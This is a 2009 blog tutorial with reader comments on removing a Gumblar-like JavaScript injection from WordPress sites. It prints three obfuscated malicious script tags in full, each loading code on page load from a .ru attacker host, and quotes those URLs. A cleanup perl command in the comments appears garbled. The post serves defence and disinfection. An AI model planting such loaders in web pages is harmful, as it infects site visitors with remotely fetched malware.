By Febryan Paudi • December 9, 2009 • Tutorial • 18 Comments

Sebarkanlah kebaikan...

Rasulullah shallallahu 'alaihi wasallam telah bersabda: "Barang siapa mengajak kepada kebaikan, maka ia akan mendapat pahala sebanyak pahala yang diperoleh orang-orang yang mengikutinya tanpa mengurangi pahala mereka sedikitpun. Sebaliknya, barang siapa mengajak kepada kesesatan, maka ia akan mendapat dosa sebanyak yang diperoleh orang-orang yang mengikutinya tanpa mengurangi dosa mereka sedikitpun." (HR. Shahih Muslim)

As yesterday, I found unknown code at the bottom of each wordpress file (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action.

So far, I’ve found this javascript malicious code with different var value. Nhbk5v835x5dq6, H3qqea3ur6p, and Jqjzlgspz98uxl.

This code will load another malicious script from http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^& (c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$ !(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/$|$|\^|\!|@|\$|#|&/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl) ;}} catch(e) {}</script>

This code will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|$|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

This code will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src', 'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|$|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

Some of WordPress, Joomla, and Pligg users have reported this problem in several forums. I’ve successfully cleaned this virus from my iPhone blog and ryan-isra.net as well. This tutorial will guide you how to disinfect your WordPress blog from this virus.
It’s very recommended to have Notepad++ application installed in your Windows to make this process easier.
You can download Notepad++ from this link.

1. Login to cPanel (if applicable)
2. Edit the content of index.php in root directory to be any text (i.e. Under Maintenance) to protect your visitors of being infected.
3. Create a zip file of wp-content directory, download it to local computer and extract it.
4. Use search feature and find all javascript files in wp-content folder.

5. Open Notepad++, then select all files in Search Results screen. Drag all files into Notepad++’s window.

6. Press CTRL+H key, paste the javascript malicious code in “Find what” field and leave empty the “Replace with” field.

7. When finished, click File – Save All or simply press CTRL+SHIFT+S key.
8. Repeat the step#4 and change *.js to *index*
9. Repeat the step#8 and change *index* to *default*
10. Remember the path of each file and then re-upload each file to its own path.
11. Get a fresh copy of wordpress, copy wp-admin and wp-includes directories, compress, and upload to your hosting.
12. Replace wp-admin and wp-includes directories in your hosting with the one that you just uploaded.
13. Now, ensure that your computer is clean of virus/keylogger/trojan and then change your cPanel/FTP password.

The process could be simpler if you have never changed/customized any of your wordpress theme/plugins. You could simply re-upload a fresh wordpress installation, themes, plugins.

I am so sleepy, sorry if something is wrong or missing.

- Update -
Please see these comments, some of them may help you better than my post.
Thanks guys.

what most people search here: ryan-isra net, xtube virus, wordpress javascript virus, xtubes com, javascript virus, javascript virus code, MALicious javascript download, javascript malicious code, javascript virus wordpress, israa org (file sarche), gumblar fix wordpress, virus javascript code

Allahu A'lam. Allah Maha Mengetahui.
Semua kesalahan yang ada di blog ini datangnya dari kesalahan dan lalainya manusia (saya sendiri), mohon koreksinya kalau dirasa ada yang salah.

Related posts:

Malicious Javascript Code infected my blogs

Tags: Javascript, Malicious, Security, Virus, Wordpress, www.ryan-isra.net

Facebook Comments:

18 Awesome Comments So Far
Don't be a stranger, join the discussion by leaving your own comment →

Pat→
December 11, 2009 at 08:59 #

Worked a treat….well done and thank you.

Are you hosted on 1and1?

Reply

Ryan Isra→
December 11, 2009 at 09:02 #

You're welcome.
Nope.
However, this is client issue.

Reply

daniel washbrook→
December 11, 2009 at 15:05 #

If anyone is looking for the same code but on a unix server, this worked for me:

to list the files:

find . -exec grep "GNU GPL" '{}' ; -print

to find and replace them:

find . -type f | xargs perl -pi -e 's//*GNU GPL.*{}$/
/g'

It will basically find anything that starts with

*GNU GPL

and finishes with

{}

Cheers

Reply

Ryan Isra→
December 11, 2009 at 08:13 #

Hi Daniel, Thanks for the bash|shell command.
Unfortunately, my hosting prevent me to upload php command shell and I haven’t request for SSH access yet :(
Thanks again, Daniel ;)

Reply

Pat→
December 11, 2009 at 23:58 #

Anyone care to/able to explain how this happened?

Reply

Ryan Isra→
December 12, 2009 at 00:02 #

If you see my previous post, there are some links, which are helpful (for me).

Reply

MOGmartin→
December 12, 2009 at 02:49 #

I have code that removes the virus from any infected webpage: you can get it here:

http://seoforums.org/site-optimization/118-script…

BUT BE SURE TO CHANGE ALL YOUR FTP PASSWORDS IMMEDIATELY, THEY HAVE BEEN COMPROMISED.

Reply

Ryan Isra→
December 11, 2009 at 19:52 #

It’s modified version of gumblar removal tools, isn’t it?
Thank you so much, Martin.

Reply

MOGmartin→
December 12, 2009 at 02:57 #

It was written by a friend of mine, he is in the attribution at the top of the text, Im not sure what he based the code on but if its similar its a good guess!

perhaps you could link to that page with the fix in your main article so that others can find it?

thanks!

Martin

Reply

Konstantin Boyko→
December 13, 2009 at 01:38 #

As the author of the script mentioned, I can say that it was written from scratch. I had to find a quick solution for fixing about a hundred of sites infected. Though it has various incompatibilities with some servers and is heavy on server resources it was well-tested by me and Martin on bunch of sites and as far as I can see it helps much.

So I hope it can be useful for many people.

Reply

Martijn→
December 18, 2009 at 02:41 #

I love the internet! Thank you for this well documented fix. Worked like charm. Still in the dark here though as to how that got on the website. Really no clue…

Cheers.

Reply

predrage→
December 18, 2009 at 18:32 #

Tnx a lot m8,

Do you have any idea about how did we get that virus? Maybe over FTP or Browser?

Reply

Ryan Isra→
December 18, 2009 at 20:13 #

Hi predrage,

You could read previous posts, there are some useful links.

Reply

Andrew::→
December 19, 2009 at 21:18 #

Hey thanks for the information, helped me a lot. May I ask how you figured out those scripts will load malicious files from other website?

Reply

Ryan Isra→
December 20, 2009 at 09:47 #

Read my previous post, when my blogs were being infected.

Reply

Vladimir→
December 21, 2009 at 11:28 #

I used the modified Konstantin's script on win hosting site, Joomla CM. Just commented out the backup part and it worked.

1000+ files were infected per site.

Tried also on localhost with apache server – copy the site on localhost, run the script without .tar backup. Works fine.

Thank you guys, especially Ryan & Konstantin.

Reply

HTML Tutorials→
February 9, 2010 at 00:31 #

Hey Martin I tried that curevir.php for some reason it did not work for me. It looks I will have to follow that Notepad++ method.

Reply

Trackbacks/Pingbacks

Cum am scapat de injectionul javascript <script>/*GNU GPL*/ try{window.onload - December 12, 2009
[...] Ryan Isra zice ca e o varianta mai noua de Gumblar, un trojan dubios. Cum te infectezi cu el? Probabil intri [...]

Leave a Comment
Remember to play nicely folks, nobody likes a troll.

Click here to cancel reply.

About Me

Hi there, I'm Ryan. Welcome to my personal blog. You may find useful contents, junkie posts, or some business opportunities. Silahkan lihat-lihat, klik-klik, atau cuap-cuap...
more about Ryan Isra...

How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)

18 Awesome Comments So Far

Trackbacks/Pingbacks

Leave a Comment

About Me

Recent Comments

Archives